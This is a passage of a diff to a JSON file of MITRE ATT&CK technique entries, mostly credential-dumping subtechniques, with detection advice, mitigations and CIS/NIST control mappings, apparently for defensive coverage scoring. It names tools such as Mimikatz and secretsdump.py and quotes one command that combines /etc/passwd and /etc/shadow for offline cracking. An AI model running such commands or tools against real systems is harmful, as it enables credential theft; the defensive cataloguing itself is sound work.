+        "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n",
+        "url": "https://attack.mitre.org/techniques/T1003/003",
         "tactics": [
-            "Discovery"
+            "Credential Access"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.",
         "platforms": [
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: Process Creation"
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.12380952380952381,
-        "adjusted_score": 0.12380952380952381,
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.5476190476190477,
+        "adjusted_score": 0.5476190476190477,
         "has_car": true,
         "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.11",
+            "3.12",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "11.3",
+            "14.1",
+            "14.3",
+            "16.1",
+            "16.9"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CP-9",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-12",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.023809523809523808,
-            "detection_score": 0.05
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1008",
-        "name": "Fallback Channels",
-        "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
-        "url": "https://attack.mitre.org/techniques/T1008",
+        "tid": "T1003.004",
+        "name": "OS Credential Dumping: LSA Secrets",
+        "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n\n[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)",
+        "url": "https://attack.mitre.org/techniques/T1003/004",
         "tactics": [
-            "Command And Control"
+            "Credential Access"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Flow"
+            "Command: Command Execution",
+            "Windows Registry: Windows Registry Key Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.20476190476190476,
-        "adjusted_score": 0.20476190476190476,
+        "cumulative_score": 0.4,
+        "adjusted_score": 0.4,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
+        "has_es_siem": true,
         "has_splunk": false,
         "cis_controls": [
-            "13.3",
-            "13.8"
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.3",
+            "16.1",
+            "16.9"
         ],
         "nist_controls": [
-            "AC-4",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
             "CA-7",
             "CM-2",
+            "CM-5",
             "CM-6",
-            "CM-7",
-            "SC-7",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-39",
             "SI-3",
             "SI-4"
         ],
-        "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.10476190476190476,
-            "mitigation_score": 0.18181818181818182,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1010",
-        "name": "Application Window Discovery",
-        "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.",
-        "url": "https://attack.mitre.org/techniques/T1010",
+        "tid": "T1003.005",
+        "name": "OS Credential Dumping: Cached Domain Credentials",
+        "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)\n\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)\n\nWith SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.\n\nNote: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)",
+        "url": "https://attack.mitre.org/techniques/T1003/005",
         "tactics": [
-            "Discovery"
+            "Credential Access"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
         "platforms": [
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation"
+            "Command: Command Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.10952380952380952,
-        "adjusted_score": 0.10952380952380952,
-        "has_car": true,
+        "mitigations": [
+            {
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.4380952380952381,
+        "adjusted_score": 0.4380952380952381,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.3",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-3",
+            "SI-4"
+        ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.009523809523809523,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1011",
-        "name": "Exfiltration Over Other Network Medium",
-        "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network",
-        "url": "https://attack.mitre.org/techniques/T1011",
+        "tid": "T1003.006",
+        "name": "OS Credential Dumping: DCSync",
+        "description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.\n\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)\n\nDCSync functionality has been included in the \"lsadump\" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)",
+        "url": "https://attack.mitre.org/techniques/T1003/006",
         "tactics": [
-            "Exfiltration"
+            "Credential Access"
         ],
-        "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
+        "detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)\n\nNote: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Access",
-            "Network Traffic: Network Connection Creation",
+            "Active Directory: Active Directory Object Access",
             "Network Traffic: Network Traffic Content",
             "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1011.001",
-                "name": "Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth",
-                "url": "https://attack.mitre.org/techniques/T1011/001",
-                "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.",
-                "detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    }
-                ]
-            }
-        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.16666666666666669,
-        "adjusted_score": 0.16666666666666669,
+        "cumulative_score": 0.3857142857142857,
+        "adjusted_score": 0.3857142857142857,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
             "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
-            "AC-18",
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
             "CM-6",
-            "CM-7",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-3",
             "SI-4"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.06666666666666667,
-            "mitigation_score": 0.12727272727272726
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1012",
-        "name": "Query Registry",
-        "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
-        "url": "https://attack.mitre.org/techniques/T1012",
+        "tid": "T1003.007",
+        "name": "OS Credential Dumping: Proc Filesystem",
+        "description": "Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.\n\nThis functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.",
+        "url": "https://attack.mitre.org/techniques/T1003/007",
         "tactics": [
-            "Discovery"
+            "Credential Access"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\\*/maps, where the \\* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
         "platforms": [
-            "Windows"
+            "Linux"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Access"
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.5552685161904761,
-        "adjusted_score": 0.5552685161904761,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.30952380952380953,
+        "adjusted_score": 0.30952380952380953,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-3",
+            "SI-4"
+        ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.07619047619047618,
-            "detection_score": 0.16
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.12907804
+        "hardware_coverage": false
     },
     {
-        "tid": "T1014",
-        "name": "Rootkit",
-        "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)",
-        "url": "https://attack.mitre.org/techniques/T1014",
+        "tid": "T1003.008",
+        "name": "OS Credential Dumping: /etc/passwd and /etc/shadow",
+        "description": "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)\n\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db\n",
+        "url": "https://attack.mitre.org/techniques/T1003/008",
         "tactics": [
-            "Defense Evasion"
+            "Credential Access"
         ],
-        "detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)",
+        "detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Linux"
         ],
         "data_sources": [
-            "Drive: Drive Modification",
-            "Firmware: Firmware Modification"
+            "Command: Command Execution",
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1003",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.11992208904761906,
-        "adjusted_score": 0.11992208904761906,
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.3190476190476191,
+        "adjusted_score": 0.3190476190476191,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": false,
+        "has_sigma": false,
+        "has_es_siem": true,
         "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": false,
+        "cis_controls": [
+            "3.3",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-39",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.019047619047619046,
-            "detection_score": 0.04
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00087447
+        "hardware_coverage": false
     },
     {
-        "tid": "T1016",
-        "name": "System Network Configuration Discovery",
-        "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
-        "url": "https://attack.mitre.org/techniques/T1016",
+        "tid": "T1005",
+        "name": "Data from Local System",
+        "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+        "url": "https://attack.mitre.org/techniques/T1005",
         "tactics": [
-            "Discovery"
+            "Collection"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
         "platforms": [
             "Linux",
             "Windows",
@@ -939,766 +1382,574 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation",
+            "File: File Access",
             "Script: Script Execution"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1016.001",
-                "name": "System Network Configuration Discovery: Internet Connection Discovery",
-                "url": "https://attack.mitre.org/techniques/T1016/001",
-                "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.",
-                "mitigations": []
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
